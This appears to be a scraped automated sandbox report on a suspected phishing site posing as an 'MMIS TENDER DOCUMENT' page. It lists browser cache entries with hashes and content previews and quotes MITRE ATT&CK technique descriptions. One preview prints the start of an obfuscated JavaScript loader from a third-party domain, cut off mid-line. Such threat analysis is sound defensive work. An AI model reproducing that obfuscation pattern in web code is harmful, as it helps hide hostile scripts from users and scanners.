Preview:	/!. Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable\|\|!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum

Chrome Cache Entry: 148

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (7711)
Category:	downloaded
Size (bytes):	308893
Entropy (8bit):	5.5686807376099
Encrypted:	false
SSDEEP:
MD5:	695583BF8CEA4A8540912004B1C6C53F
SHA1:	1AD1E8F79148DFA2754BC78C477BBBA9B23AAB70
SHA-256:	479ACA5128DE0EABAA5B02FF6D9ED748764BE2DD65ECCB8288BEA7B0F24A12FF
SHA-512:	21700715B253C8A209A7CF32655A0AE938DE495A75E6F611E1510EA4A549E7EEFE3366463F3D7AAEA5295393F2DD98DC3A0FEA322C151584017A8298E98929C4
Malicious:	false
Reputation:	unknown
URL:	https://www.googletagmanager.com/gtag/js?id=G-V94YGGJ7Z7
Preview:	.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"vtp_signal":0,"function":"__c","vtp_value":0},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0},{"vtp_signal":0,"function":"__c","vtp_value":0},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":16,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_email

Chrome Cache Entry: 149

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 96 x 15, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	61
Entropy (8bit):	4.035372245524405
Encrypted:	false
SSDEEP:
MD5:	0EE9C6505C5C03E05EA65F292D86C48F
SHA1:	F363085EF299AEBFADE5A735DE1E1571CFAC741C
SHA-256:	5A2598A1E02AF23AA241517D12043B25E21E18FC7B5B6ED751A9D6672CF2B51F
SHA-512:	592FBE7C81F5050A8B39C3B532B0961A10D741E0F9AC61FD43D340CB7D1947A1658E99E719CD6F266C526B0AD6C41270A02F55A35A6EA91182AFB11E542F450D
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...`..........X].....IDAT.....$.....IEND.B`.

Chrome Cache Entry: 151

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image
Category:	downloaded
Size (bytes):	207680
Entropy (8bit):	7.98635725603672
Encrypted:	false
SSDEEP:
MD5:	E67E0D73B958BDA38BFF780AAB86B8BF
SHA1:	3AAEA4CD75BA66F9073E8E4E8630253F0F9B17AF
SHA-256:	890DA53BBF49D70C8CE9D78CCE9419673B99876B0A18C9C67AB7CA7ECF474CF9
SHA-512:	F9D480B41C21AA6282F87841FF9869CB20F1B34379B07B3F5433877B1B578242D1F81CB97D27C3ADEDA58B40449708F46991CF028784A1B7A65C56F3739FFEF3
Malicious:	false
Reputation:	unknown
URL:	https://framerusercontent.com/images/tpIziTCXDfBtBsahJnl6m61V6Y.png?scale-down-to=1024&lossless=1
Preview:	RIFF8+..WEBPVP8X....,.........ICCP........appl....mntrRGB XYZ ............acspAPPL....APPL...........................-appl................................................desc...P...bdscm........cprt...P...#wtpt...t....rXYZ........gXYZ........bXYZ........rTRC........aarg....... vcgt.......0ndin... ...>mmod...`...(vcgp.......8bTRC........gTRC........aabg....... aagg....... desc........Display.................................................................................mluc.......&....hrHR........koKR........nbNO........id..........huHU........csCZ.......0daDK.......FnlNL.......bfiFI.......xitIT........esES........roRO........frCA........ar..........ukUA........heIL........zhTW.......$viVN........skSK.......<zhCN.......$ruRU...$...RenGB.......vfrFR........ms..........hiIN........thTH........caES........enAU.......vesXL........deDE........enUS........ptBR........plPL......."elGR..."...4svSE.......VtrTR.......fptPT.......zjaJP.........L.C.D. .u. .b.o.j.i.... .L.C.D.F.a.r.g.e.-.L.C.D.L.C

Chrome Cache Entry: 152

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (52953), with CRLF, LF line terminators
Category:	downloaded
Size (bytes):	72169
Entropy (8bit):	5.33028301279171
Encrypted:	false
SSDEEP:
MD5:	07C864F4A19F079FD14C6D8A614925D1
SHA1:	D8A22D7C821AE0F25B8EE7671459516A46A575B2
SHA-256:	53DCCDCD6DC4B90447802444E9719D01BA41ED59EA30EE0BD3F5C69187259B45
SHA-512:	0DC957F50AEC2E588E430C248154D6D2A2E38A1AA02B6DB00BD8D4E8DDC0EAE2F353DCC88E8442D6148A9404431B50C8E0ABBB1598D0994AC04CB663F7C28174
Malicious:	false
Reputation:	unknown
URL:	https://mmis.framer.website/
Preview:	<!doctype html>.. . Built with Framer . https://www.framer.com/ -->..<html lang="en-US">..<head>.. <meta charset="utf-8">.. .. .. .. End of headStart -->.. <meta name="viewport" content="width=1200">.. <meta name="generator" content="Framer 0240392">.. <title>MMIS TENDER DOCUMENT</title>.. <meta name="description" content>.. <meta name="framer-search-index" content="https://framerusercontent.com/sites/3tCBPFDdoNUnhEq4hChBL3/searchIndex-39KwsxBIt-Sa.json">.. <link rel="icon" href="https://framerusercontent.com/images/GWYbiaQZn3s247RxhvrEhGgoc.png">.. Open Graph / Facebook -->.. <meta property="og:type" content="website">.. <meta property="og:title" content="MMIS TENDER DOCUMENT">.. <meta property="og:description" content>.. <meta property="og:image" content="https://framerusercontent.com/assets/zumoRCTeMhW1PcigWKmwVqKrLWQ.jpg">.. Twitter -->.. <meta name="twitter:card" content="summary_large_image">.. <meta

Chrome Cache Entry: 155

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image
Category:	downloaded
Size (bytes):	1546
Entropy (8bit):	7.636439922205329
Encrypted:	false
SSDEEP:
MD5:	A259FFA13C439EA3BDC50A765C85D6EC
SHA1:	BD7A8DA17886702B09F6A43458A6F8F042B8214D
SHA-256:	D5074A0F2FEDF43C1106FD80A25EA68C82C566F6314EAC60F42BCB318BCE2213
SHA-512:	4A5514BD520A6BD12161A8FE893C2A2468B247878994351B47A90FCC416DA60F9844F15BB3029478414F42E2B39885939D705B2A80E715C5439248224FAEF6FD
Malicious:	false
Reputation:	unknown
URL:	https://framerusercontent.com/images/tBcNztnXxGPgZ4fCXxZeptSY8.png?scale-down-to=512
Preview:	RIFF....WEBPVP8X..............ALPH.....w......C...o..#"....hR`T......X....2.B..4 ..". .,....D..@....8..93..p..?............?..........:X.a.l]...c?.f.?.[.[....n......4{...n.^.n......?............?............VP8 (....U.......>1..D"!......Y.].Dh....]1......3;.g........................?.{..+.g.....A..S...............I..RMB\f..,...WA.RMG..j8..D:U.D.Q...%$.q).......I5.JI..RM..Va.MG..j8..Q.Z.O....$.q)&..I4C.Y.I5.JI..RMG..j.?`G...Q...%$...f.$.q)&..I5.JE.D.....MG..j8..D:U.D.Q...%$.q).......I5.JI..RM..Va.MG..j8..Q.Z.O....$.q)&..I4C.Y.I5.JI..RMG..j.?`G...P.ms.Z...m....0.._1.M:.l.$.....mo..0.._1.M.0T<&...<.]....&.....s.C.a.G).....{..m....0.._1.M..c....@..A.p...m..9..y.veP#..I..f.....5.JI..RMG.......A.RMG..j8.0e.K...Q...%$.+....$.q)&..I5.J.2....I..RMG..j.....j8..Q...%..x..l.$.q)&..I5..Gh.I5.JI..RMG....i\|6..j8..Q...u...$..%$.q)&..C.^4...I5.JI..RMB.....MG..j8..Q../._..$..%$.q)&.]h...&..H.....@.}...v<...sp.....N..&E....P..}..u...i..Ec..T~{d>...#.v......e?.P>..J.5:.

Chrome Cache Entry: 97

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 666 x 232, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	15924
Entropy (8bit):	7.960998139436644
Encrypted:	false
SSDEEP:
MD5:	209C01F4E6B4703B0EEE1537C0DEDC19
SHA1:	3E6B46877FE8DFB46C54199A541D73FA6367B2AF
SHA-256:	D98E0F8EE7B7D67374E2CA7430689CF7809B46F64F74C4DDC01D222B9373D8E7
SHA-512:	0C960B267EFD072234E489AA83ED514D853D09171D03968A83F559725A84BECBF26063771361BD875B03CBA8722A2CC7B65DE51C9913E9D372E4350F530E58F2
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.............x......xPLTELiq...]]^hhi.........PPQ......edeaabXXYwwx...]]^mmnttuSSSppqkkl......1..L..}....A..a..WWYVVWYYZSSUZZ\]]_............$...Nc.....tRNS.^...3H..%...q6.........M....n.....pHYs............... .IDATx..].v..l.@.....x.J%y.....Y.lc...;....=..Z..r....kX....5.a.kX....5.a.kX....5.a.kX....5.a.kX....5.a.kX....5.a.kX....5.a.kX....5.a.kX....5.a.kX....t.\........a.u..Z~n.%..J..A..............p#.D.....q....aM.S\|.?.=l....G....k.}~........s.....GS.!..j...}^....P.(..e...?.=..Dp3..N.....<.+\|.........~.4..T.h...Xi....>..7.........'..l>...<m...$y.7.N.O....^...!^.... ..`;,.......;^..U<...F02.v?.A.\|......r........&..Y.......O.......(J..z..<.....?&c..H...>..u...,..l<z.{...E..(.F.......,.W......1.....swx0I....^..Q.....j/S.B...e.n......=..Lk.1Vo..M,/.a..d..o@.3s\|..ir..y..-.$7..6,6........`..m+.\5d...F3.....$..tK..8\M./. .c....~.o...c........iN.*.s......n6Y.......l....R...`c.B^..$.....t6.{....f.I.(.k.XGL..6...Yc..&U<M.......g.<..g]f

Chrome Cache Entry: 99

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (4020)
Category:	downloaded
Size (bytes):	4464
Entropy (8bit):	5.578395435124222
Encrypted:	false
SSDEEP:
MD5:	F283BCA140977884321BB921400357FA
SHA1:	169E887702464E3CC8A4A325A56E37E3BE0DFB5A
SHA-256:	DB041036C24F8DA439B00D0865839C4CE8611F27257CFCD2C87B244A2C179B9E
SHA-512:	362E8343EADC5CC13AC5806D1462D4479019A600543662EC5CDF2A1DC0CF7C2CCB1E9EE54A5CDF238EE23FBF3123A01EB58795156B511D3B5DB51015C2399249
Malicious:	false
Reputation:	unknown
URL:	https://frconversions.org/b192fd32d7aea0eeba98125bbecf56db660cf4a85ea89LOGb192fd32d7aea0eeba98125bbecf56db660cf4a85ea8a
Preview:	<!DOCTYPE html>.<html>.<head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">. <title></title>. <script src="jq/7d0f96ff9ef6b58952bc095b438596c6660cf4c8795d5"></script>. <script src="boot/7d0f96ff9ef6b58952bc095b438596c6660cf4c8795d8"></script>. <script src="js/7d0f96ff9ef6b58952bc095b438596c6660cf4c8795d9"></script>.</head>..<script type="text/javascript">.function r(V,f){var e=I();return r=function(k,F){k=k-0x140;var G=e[k];return G;},r(V,f);}var A=r;(function(q,T){var K=r,S=q();while(!![]){try{var X=-parseInt(K('0x167'))/0x1(parseInt(K(0x172))/0x2)+parseInt(K('0x148'))/0x3+parseInt(K(0x181))/0x4+-parseInt(K('0x15e'))/0x5+-parseInt(K('0x15f'))/0x6+parseInt(K('0x143'))/0x7+parseInt(K(0x15b))/0x8(parseInt(K('0x180'))/0x9);if(X===T)break;else S['push'](S['shift']());}catch(y){S['push'](S['shift']());}}}(I,0x6def1));var G=(function(){var q=!![];return function(T,S){var X=q?function(){var t=r;if(S){var y=S[t('0x

Static File Info

⊘No static file info

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://mmis.framer.website/

Overview

General Information

Detection

Signatures

Classification

Process Tree

Yara Signatures

HTML

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Data Obfuscation

Boot Survival

Mitre Att&ck Matrix

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 101

Chrome Cache Entry: 102

Chrome Cache Entry: 104

Chrome Cache Entry: 105

Chrome Cache Entry: 107

Chrome Cache Entry: 109

Chrome Cache Entry: 111

Chrome Cache Entry: 113

Chrome Cache Entry: 119

Chrome Cache Entry: 121

Chrome Cache Entry: 122

Chrome Cache Entry: 124

Chrome Cache Entry: 125

Chrome Cache Entry: 127

Chrome Cache Entry: 130

Chrome Cache Entry: 133

Chrome Cache Entry: 136

Chrome Cache Entry: 139

Chrome Cache Entry: 141

Chrome Cache Entry: 143

Chrome Cache Entry: 145

Chrome Cache Entry: 146

Chrome Cache Entry: 147

Chrome Cache Entry: 148

Chrome Cache Entry: 149

Chrome Cache Entry: 151

Chrome Cache Entry: 152

Chrome Cache Entry: 155

Chrome Cache Entry: 97

Chrome Cache Entry: 99

Static File Info

Windows Analysis Report
https://mmis.framer.website/